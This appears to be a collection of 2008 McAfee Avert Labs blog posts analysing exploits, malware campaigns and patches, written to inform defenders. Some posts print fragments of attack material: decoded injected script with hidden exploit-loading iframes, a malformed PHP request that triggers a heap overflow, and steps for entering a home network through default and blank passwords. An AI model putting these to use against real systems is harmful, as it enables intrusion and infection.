Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out to an unsuspecting user.

Upon opening the word document the embedded ActiveX control with the following classid  is instantiated and executed.

• {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace .

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x that references already freed memory in the mshtml.dll.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this, and future variants, of the W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays!

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

Probably the most widely reported topic in the Chinese Security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted on to a well-known public repository site. In a few days, malware kit author, WolfTeeth, was quick to sell a MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

Taking a peek into his “malware shop”, one finds a series of malware kits for sale – including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offers a free version, and a commercial version with enhanced features including:

• Kernel rootkit.
• Anti-virus software termination.
• Weekly anti-virus detection monitoring and evasion service.
• Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page, he has publicly priced a AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, downloads updates and stealth capability.

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

It has been over 2 years since I last wrote about malware exploitation of a major vulnerability in the Windows Server Service (MS06-040) by malware.

In 2006, worm authors were quick to adopt the remotely executed exploit in just 4 day following a security update released as part of the regular Patch Tuesdays – IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, et ceteras.

Now in 2008, we are faced with malware authors, motivated by profits, more organized, and are more likely to target zero-day vulnerabilities, as we have reported on several critical incidents we have discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new MS08-067 vulnerability targeting the same Windows Server Service.

Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it was using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that would look very familiar to those familiar with MS06-040.

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

(shellcode after decoding)

Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(thanks to Joey Koo and Xiaobo Chen for providing analysis data and packet dumps used in this blog)

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware – Emergency DAT cut and testing in progress. ETA of 2 – 3 hours.

HIPS – Generic buffer overflow should provide coverage.

Intrushield – Partial existing coverage. Additional emergency sigset releasing today.

Foundstone – Emergency signatures being released today.

V-Flash – Emergency signatures being released today.

MNAC – Emergency signatures being released today.

VirusScan Enterprise BOP – Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 – What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting – Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

A zero-day exploit against the latest QuickTime (Version 7.5.5) and iTunes (8.0) was released yesterday. The exploit author announced this as a remote heap overflow so we decided to take a look and analyze it.

After our research, we found that this is actually an off-by-one stack overflow. Some noteworthy points:

1. QuickTime has the /GS switch option enabled, hence a cookie is put into the stack.

2. Since this is an off-by-one stack overflow, the attacker can just overwrite one byte of the cookie. The Check_stack_cookie function is called when the function returns. If the Check_stack_cookie found out that the cookie is not matched, then the program exits. This results in the crash of QuickTime and iTunes.

The crash means it is unlikely that code execution would be feasible via this attack vector. Howerver, users of these apps should take the attack seriously and look at appropriate defenses.

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure You Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure their routers.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so – identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router – “admin”. I tried that and sure enough, got into the admin page.

Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me – “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are are just a couple tips to get you started with security and get you in way better shape than my friend:

1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
3. Disable NULL sessions. Look up how to do it online.

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor , Ichitaro, last Friday.

This Japanese application have been known to be under the targeted attacks for several years and a few 0-day vulnerabilities were discovered and exploited in the past. Other than Ichitaro, other popular and localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities, even months after they have already been patched by the vendor.

Users should continue to stay vigilant of any suspicious email attachments, and do not open unknown files. Please be sure to update your applications, whether it is popular or not, with the latest security patches to protect you and your organization from the known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledge the vulnerability and will be posting a patch.

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

• gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
• running a malicious MIDlet when the phone is first turned on
• accessing files
• sending SMS/MMS
• making phone calls
• reading your contacts
• accessing the SIM card
• eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesbe,r which cause just premium rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof of concept(PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

We came across some samples and some vendors claims that the these samples were exploiting the new PDF vulnerability CVE-2008-2641.

We took a look at this issue and found that this is not the case, it’s still exploiting the old vulnerability CVE-2007-5659, which is a buffer overflow vulnerability in JavaScript function Collab.collectEmailInfo in Adobe PDF Reader’s own JavaScript Engine.

The JavaScript itself was compressed in the PDF file. After decompressing the content, it showed up an obfuscated JavaScript code. After digging through the obfuscated code, the real exploit was found encrypted in a long string. There is a function which decrypts the string into real exploit code and then pass it to the eval() function.

It’s interesting that the function uses the function code itself (arguments.callee) as part of the key to decrypt the real exploit code, so it won’t work if you simply replace eval() with “alert” or “document.write” to get the real exploit as eval() itself is also part of the key. It’s an interesting way to obfuscate the exploit code to prevent security researchers to reach the real exploit, almost like creating a ’self-checksum’ mechanism.

After we figured out the way to get the real JavaScript exploit code we found that it exploits CVE-2007-5659 reliably with heap spray technology.

Some vendors claim that the exploit works on lower versions but crashes 8.1.2, this is not the case because it’s possible that it might be taking some time for the heap spray to fill the memory. So during that period, we observed that the adobe reader lost response, but it’s not a crash. After a couple minutes, its back to normal, and pop ups a dialog box “Send by Email for review”. So, in short Adobe reader 8.1.2 seems to be immune to this exploit as Adobe already patched this vulnerability.

Avert Labs recently discovered and reported a couple of Linux Kernel vulnerabilities, all of which have been patched by linux kernel maintainers.

The first one is BER Decoding Remote vulnerability (CVE-2008-1673) . This vulnerability was patched by the Linux dev team on 9th June 2008.

This vulnerability is a kernel heap overflow in CIFS module and ip_nat_snmp_basic module. It’s possible to reach the exploitable condition on 64bit platform. Though its hard to trigger a kernel heap overflow in 32bits platform, it’s still possible to crash the Linux box. We strongly recommend users to update to the following kernel versions:

Linux kernel 2.6.25 .5
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.4.36.6

Some vendors have mistakenly marked this as a vulnerability exploitable only in the local network. A correction for them, this vulnerability is remotely exploitable. We contacted one such security service providers who had mentioned this issue as exploitable over the ‘local network’ only and got this response:

“According to our information the ASN.1 decoding vulnerability exists within the modules handling CIFS and SNMP traffic. These are both protocols which we think should be firewalled off the Internet via common “best practices”, thus we set the attack vector to “local network” only.”

I don’t really agree with this approach, anything that is firewallable is locally exploitable then? In fact I would rather say that it is remote vulnerabilities like these that need firewall policies to be enabled and not the other way round. I would love to hear opinions from others on this issue.

BTW our McAfee Network Security Platform (formerly IntruShield) has already been updated with content to protect against this vulnerability.

The other issue was found by Brandon Edwards which is another interesting issue in DCCP, it is a local privilege escalation vulnerability (CVE-2008-2358). The vulnerability (supposedly) only exists in 2.6.17, 2.6.18, and 2.6.19 due to boundary checks in the upstream kernel versions. It is non-trivial to exploit this vulnerability.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic – Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability: CVE-2007-0071. At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

The exploits that we have captured from the field do not appear to exploit the latest version of Flash. We continue to hunt for missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it’s best to update to the latest player, if you haven’t yet done so.

Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability.  Through looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks.  Hacked sites reference an external script, just as they have for quite some time.  But, the external scripts now reference an SWF file.  This SWF file references another SWF file named: WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be off-line.  While we can not confirm this last SWF file attempts to exploit this new vulnerability, Symantec mentioned the same domain serving the exploit earlier.  SANS also mentions another domain, and 2 presumed exploits, named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf), and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf) also off-line.  These file names suggest 3 things.

1) Different exploits are crafted to exploit different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0.
2) Versions of the exploit may also exist, or be under development, to target other operating systems, as the aforementioned file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in “i”, “ie”, or “ff”

Thus far we’ve identified 2 particular domains involved in mass hacks that are also believed to have served these Flash exploits.  Combined, Google yields approximately 250,000 page results when searching for those references (ie. compromised sites that link to scripts that link to flash exploits).

Again this threat is still under analysis, more details to follow.

In March I blogged about a round of mass Web site compromises. Since then there have been several other instances discovered, as well as a couple of smoking guns. The net net is that the bad guys are using automated tools to find and attack Web applications that are vulnerable to SQL-injection attacks. Many of these applications are homegrown and thus there is no patch or hotfix for administrators to install. This means that simply removing the injected malicious code won’t last long.

Just now I was reviewing the latest batch of hacked sites, and I noticed pages that were previously compromised and “repaired,” only to be compromised again. The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input validation must be corrected. And given that many Web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a very long time.

McAfee’s Foundstone Hackme Shipping Tool can be a useful resource for those in need of a better understanding of how common Web application attacks occur and how to properly code against them.

Following the big noise that the latest mass injection of sites with malicious Javascripts infecting many computers via a number of exploits I decided to take a look at the trail that was left behind, which has proven to be an interesting exercise!

A few days ago I noticed a large number of websites that were misbehaving and I came across many pages that would fire up the usual ActiveX alert on my Internet Explorer 7 after loading a Javascript called (on this occasion) addr.js … Not surprisingly these were mostly based in China and here is a snippet of code that most of you would probably recognise by now.

So far nothing new, the Javascript function you can see above, designed by Dean Edwards to obfuscate HTML code, it has been discussed in many posts and this is a popular method for a web developers to “hide” sensitive source code on their pages. It is unfortunately also a popular method to hide malicious code too. and the example above does just that, in fact here are some interesting parts of the decoded version from the above example:

try{if(navigator.userAgent.toLowerCase().indexOf(“ms”+”ie 7″)==-1)

This will check if version of Internet Explorer is 7 and the script will then load the following IFRAMES depending on some other factors such as GMT, ActiveX, presence of Real Player version etc.

<iframe style=display:none src="http:// :///ms.gif">
<iframe style=display:none src=":///xl.gif">
<iframe style=display:none src="http:// :///bd.gif">
<iframe style=d'+'isp'+'lay:none src="http:// :///r'+'eal.g'+'if">
<iframe style=d'+'isp'+'lay:none src="http:///r'+'eal_new.g'+'if">
<iframe style=display:none src="http:// :///lz.gif">

As we can see 6 IFRAMES are hidden in the code, and they will load various pages with exactly the same exploits (with minor variations) that were used in the recent mass injection a couple of weeks ago.

So you might ask now, what’s new about that? Well, what is worrying is the fact that the pages loaded by the IFRAMES will attempt to grab some fake GIF (image) files that are in fact hiding more Javascript code but this time the code is obfuscated by yet another commercial tool called HTMLSHIP.

The following snippet is an example from one of the pages hiding a RealPlayer Exploit:

As you may have noticed this is pretty much un-readable but here is the important part of the code de-obfuscated using one of my favourite tools, the Caffeine-Monkey implementation of the Mozilla Browser engine from Ben Feinstein and Daniel Peck at SecureWorks.

----------

Above we can see the CLSID for the RealPlayer ActiveX Control.
And below we can see some of the code used to exploit the vulnerability described here.

----------------

So far I have seen a few variations in the domains used to host the various exploits involved as well as in the names for the Javascript file and we will be monitoring these for changes to see if it will be used more extensively in the future.

As of today the samples I discovered are still not detected by any AV … Well except one that is…

An additional note is the fact that the techniques used in obfuscating malicious Javascript on webpages are becoming more sophisticated and more difficult to signature for conventional AV Engines.
Nowadays there are a large number of tools similar to the ones mentioned above allowing malware authors to obfuscate with ease.

A quick parallel with binary files and their respective packers (compressors, protectors, encryptors and so on) this is not a new technique but as I said things are becoming more sophisticated just like with UPX vs the likes of Armadillo, ASProtect and others.

To hide or not To hide

In an Ideal world the people making this commercial protection software available should have no need to hide code in such convoluted ways and perhaps, in the case of web-design people should be more aware of other practices to make code secure and safe for copyrights and/or trademark reasons. For example server-side scripting, or using Ajax and Java for servlets.

If I was to embark in the task of leeching the code of a particularly interesting web-page and I understood the inner workings of scripting languages such as Javascript or the Microsoft implementation for IE’s JScript I would not be stopped by such trivial means of hiding the code that can be easily reverted to the original look with a few clicks and the latest version of a browser engine like the Mozilla Java-Script C engine.

Many Ideas are being brought forward in the field of packing and how to counteract the incredible rise in malware variants caused by it. Perhaps people making legitimate software and writing legitimate HTML code for web-pages should start coming to terms with the fact that “Security through Obscurity” has failed miserably to deliver and that, the cleaner their products the easier it will be for all of us to identify suspicious illegal software/code making the task of identifying the bad guys a little less daunting….. however this is far from an ideal world
Errr…. Linux anyone?

Sometime back we had come across this interesting vulnerability posted by a Chinese researcher in his blog, claiming to have found a zero day vulnerability in php 5.2.3.

We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerablility affects not only verion 5.2.3 but also version 5.2.5. It is a heap overflow which can be triggered when a web server with PHP receives a malformed URI request, it can be a simple request like “GET /index.php/aa HTTP/1.1″ . Successful exploitation of this can result in arbitrary code execution with the privileges of the WEB Server.

This happens because the author misplaced the bracket resulting in miscalculation of the buffer which can result in a heap overflow. So fixing this issue is also simple viz: In \sapi\cgi\cgi-man.c do a grep for: “ptlen + env_path_info ? strlen(env_path_info) : 0;” , and replace this with “ptlen + (env_path_info ? strlen(env_path_info) : 0); ”

This is one of the classic examples of small human errors (which can sometime be even typos) that can result in vulnerabilities.

We had reported this issue to PHP dev team almost immediately after we had come to know about this issue in the wild and they’ve just come out with a patch for this. We highly recommend users to update with the latest version of PHP 5.2.6 released . This patch besides this issue, fixes a host of other security related fixes, some of which we deem as critical. This specific issue affects FastCGI packages of PHP.

This issue has been given the identifier CVE-2008-0599.

We shall continue to monitor this threat and update if we come across anything malicious.

Some news is in circulation regarding a recently disclosed (and patched) vulnerability in Adobe’s Flash. The attack used dereferenced NULL pointers, which were believed to be very hard to exploit.

The findings were first revealed in a paper called “Application-Specific Attacks: Leveraging the ActionScript Virtual Machine,”(pdf) by Mark Dowd. The paper described a new technique for causing exploitable memory corruption vulnerability in Adobe’s Flash. Whilst the technique has targeted the ActionScript Virtual Machine for Win32/Intel platform, it’s understood that the attack could be carried out on any other platforms where Flash is available. The real question is whether this attack can be more generic to target dereferenced NULL pointers in general!

It is possible to do so, but it’s not that easy. There are certain conditions an exploit of this type has to satisfy before reaching the ultimate goal. Dowd used some wacky techniques to inject malicious ActionScript byte code into Flash runtime (basically by crafting an SWF with something to trigger the vulnerability and point the execution to another loaded-in-memory part of the file that had the malicious content). Then he forced malloc() to fail by trying to allocate some huge memory chunk. When malloc() failed, it returned NULL.

(OK, at this step a program trying to access a NULL pointer would basically crash, and something to check for malloc() return value is necessary to prevent that crash.)

In this case, Flash didn’t check for malloc() failure and did some pointer arithmetic operation to add the value of the pointer (NULL here) to some offset. Now, this “offset” was controllable, and this is where Dowd had preloaded his malicious content. (Don’t get too excited, folks. There were quite a few other conditions that Dowd’s exploit had to meet before loading his payload. But I’m eliminating a lot of details to present the overall picture). So now we have a pretty successful and reproducible exploit on Flash ActionScript VM. It even bypassed Vista’s ASLR because Vista’s Flash was compiled with the runtime security bit off.

Now, scaling this attack against native code is more difficult in spite of the success it had against ActionScript VM. We will still be looking for a controllable offset and a place to preload our payload. Nevertheless, it is still a neat discovery when taking into consideration the level of complexity needed to load the malicious payload.

This discovery reflects a trend that it is possible to circumvent runtime security countermeasures such as ASLR and the like by targeting other environments with higher privileges running on top of the native platform. And if you’re involved in any secure development lifecycle, you’d better go and check your code!

A Microsoft Works ActiveX potential zero-day threat has been disclosed on a handful of Chinese blog sites. This threat was originally posted as a proof of concept that caused a Windows host to crash, but very soon after, a working exploit was posted. (Show of hands: Who’s surprised?)

Here’s the meat of this: The flaw lies in an ActiveX component of Microsoft Works Image Server (WkImgSrv.dll). Yes, it appears successful exploitation would allow for code execution via a controlled pointer. For this to occur, the victim would need to visit a malicious Web site.

On the plus side, this control is not marked safe, and attempts to use it should be accompanied with a warning from Internet Explorer. Even though this is the case, you will want to set the kill bit for clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 to help mitigate. Initial testing on Windows XP SP2 and Internet Explorer 7 shows this to be easily exploitable once past the “warning” hurdle.

In the mean time, McAfee Avert Labs will continue researching this issue.

Update: June 6, 2008
Microsoft has confirmed that exploitation of this issue is not possible due to the control not being safe for scripting, nor safe for initialization. They have a nicely written, thorough write-up here explaining why.

There was an interesting article in InformationWeek this morning about a couple of security researchers who have presented the possibility of using offensive technologies to go after hackers. The most recent was Joel Eriksson from Bitsec, who presented at RSA last week about exploiting security holes in remote-access Trojans.

The article also brings up a five-year-old example of an earlier attempt at offensive technology to be used against hackers. In this case, Tom Liston created a tool called LaBrea (after the tar pits) that would ensnare computers which were being used to attack it either intentionally or due to worm infection.

There are plenty of people within the security industry who would like to be able to employ these tactics. The urge to take a pound of flesh for the late nights and weekends spent dealing with malware attacks is certainly understandable. But I know very few people in this industry who actually think it’s a sound idea, or worth the potential legal trouble.

Just as there are few locales where it is legal for you to shoot an intruder in your home, there are few locales where it is legal for you to attack those who intrude on your computer. Even in those locales where it is not illegal to attack an intruder, you must take into consideration the possible court costs. It’s highly likely the survivor (either the intruder or a family member) will sue you, and it will take some time with a lawyer to defend yourself against these charges. It’s entirely possible that a hacker or a worm-infected user would do likewise.

This is still assuming that your case was reasonably clear-cut, that it was genuinely a hacker or worm infection that was coming after you. It could just as easily be used as a sort of alternate flavor of Denial of Service attack–spoof the traffic or exploit a machine for the purpose of making it a target.

The general computing population is not particularly knowledgeable about the inner workings of their machines; some say there should be licensing such as for driving a car. It’s my opinion that there would first have to be this sort of licensing, and then a permit akin to a “Concealed Carry Permit” before this could be considered a good idea.

The Internet is a scary enough place without adding even more unskilled attackers.

